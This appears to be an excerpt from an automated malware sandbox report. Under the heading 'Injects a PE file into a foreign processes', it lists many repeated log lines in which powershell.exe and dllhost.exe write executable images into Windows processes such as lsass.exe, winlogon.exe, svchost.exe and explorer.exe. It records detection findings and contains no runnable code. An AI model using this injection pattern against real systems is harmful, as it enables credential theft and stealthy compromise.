Injects a PE file into a foreign processes

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 17D2DD20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22F4B8F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 17D2DD20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22F4B920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 262F1CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 262F1D00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23942AE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EF056A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2287AD40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B94DA60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 25202540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19FF1600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A76A170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23942AE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EF056A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2287AD40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B94DA60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 25202540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19FF1600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A76A1A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 14D26990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2175D5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B0AB960000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 14D26990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2175D5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B0AB990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2129B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2129B2D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26384180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 25178730000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26384180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 25178760000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1495FCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22125D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1495FCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22125DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 297A5D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2D0F41C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C325340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AEFCF40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 270F3530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D326280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 16131E60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AE137C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E2E4190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AB68FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 265951C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C263510000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2234E0F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18198580000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EF3C5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACF3D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E8E330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5A2950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD340C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B653790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B19A0E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24730B30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 15F35DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\sihost.exe base: 200792F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18CE9170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D959540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18F1AC00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FF01350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 221D2530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D400530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\explorer.exe base: 8850000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 27844DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 258B00D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FA9A260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dasHost.exe base: 1BFB71A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 26982020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 185706E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1496A4A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 190043F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 16215D10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 159AD5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B8E5260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 189090B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24BB06E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 28182CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 238EF1C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 2CA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 26CDA140000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1320000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 580000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1070000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: BA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 9C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 680000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1010000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: C00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 297A5D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1480000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2D0F41C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 12B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C325340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AEFCF40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 270F3530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: B60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D326280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: D70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 16131E60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 6E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AE137C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E2E4190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AB68FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1060000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 265951C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C263510000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: F80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2234E0F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18198580000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EF3C5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACF3D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 970000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E8E330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5A2950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 5A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD340C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 10E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B653790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: D00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B19A0E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24730B30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 6C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 15F35DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 980000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\sihost.exe base: 200792F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 620000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18CE9170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D959540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18F1AC00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FF01350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 221D2530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D400530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\explorer.exe base: 8850000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 580000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 27844DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 258B00D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 12A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FA9A260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: D30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dasHost.exe base: 1BFB71A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 26982020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 9E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 185706E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 840000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1496A4A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 190043F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 410000 value starts with: 4D5A
